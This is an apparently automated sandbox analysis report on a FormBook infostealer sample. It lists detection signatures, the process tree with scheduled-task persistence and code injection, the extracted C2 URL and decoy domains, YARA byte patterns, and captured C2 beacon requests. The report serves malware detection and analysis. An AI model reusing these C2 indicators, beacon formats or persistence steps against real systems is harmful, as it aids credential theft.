
Analysis Report Quotation Reques.exe

Overview

General Information

Sample Name: Quotation Reques.exe
Analysis ID: 356530
MD5: 5a752fcd71acb65c618a829610b7b7e1
SHA1: 1e0608c292a70e30f75308255d6039a8ca373d8a
SHA256: d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation Reques.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: 5A752FCD71ACB65C618A829610B7B7E1)
    • schtasks.exe (PID: 6744 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Quotation Reques.exe (PID: 6788 cmdline: C:\Users\user\Desktop\Quotation Reques.exe MD5: 5A752FCD71ACB65C618A829610B7B7E1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      6.2.Quotation Reques.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        6.2.Quotation Reques.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.Quotation Reques.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        6.2.Quotation Reques.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          6.2.Quotation Reques.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Scheduled temp file as task from temp location
          Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quotation Reques.exe', ParentImage: C:\Users\user\Desktop\Quotation Reques.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', ProcessId: 6744

          Signature Overview


          AV Detection:

          Antivirus detection for URL or domain
          Source: http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0, Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, Malware Configuration Extractor: FormBook {"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exe, ReversingLabs: Detection: 34%
          Multi AV Scanner detection for submitted file
          Source: Quotation Reques.exe, Virustotal: Detection: 26%
          Source: Quotation Reques.exe, ReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara match, File source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exe, Joe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Quotation Reques.exe, Joe Sandbox ML: detected
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          Uses 32bit PE files
          Source: Quotation Reques.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NX
          Source: Quotation Reques.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbols
          Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Quotation Reques.exe, Code function: 4x nop then pop edi

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.valiantbranch.com/0wdn/
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1 Host: www.mojavewellnessaz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1 Host: www.ficuswildlife.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.thisisauckland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.trainingkanban.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1 Host: www.sphenecouture.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1 Host: www.dorteklarskov.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.gurumanindustries.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 194.9.94.85
          Source: Joe Sandbox View, ASN Name: LOOPIASE
          Source: Joe Sandbox View, ASN Name: KRYSTALGR
          Source: Joe Sandbox View, ASN Name: GODADDY-AMSDE
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1 Host: www.mojavewellnessaz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1 Host: www.ficuswildlife.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.thisisauckland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.trainingkanban.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1 Host: www.sphenecouture.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1 Host: www.dorteklarskov.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.gurumanindustries.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknown, DNS traffic detected: queries for: www.diabetessurgeryturkey.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:39:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 
64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
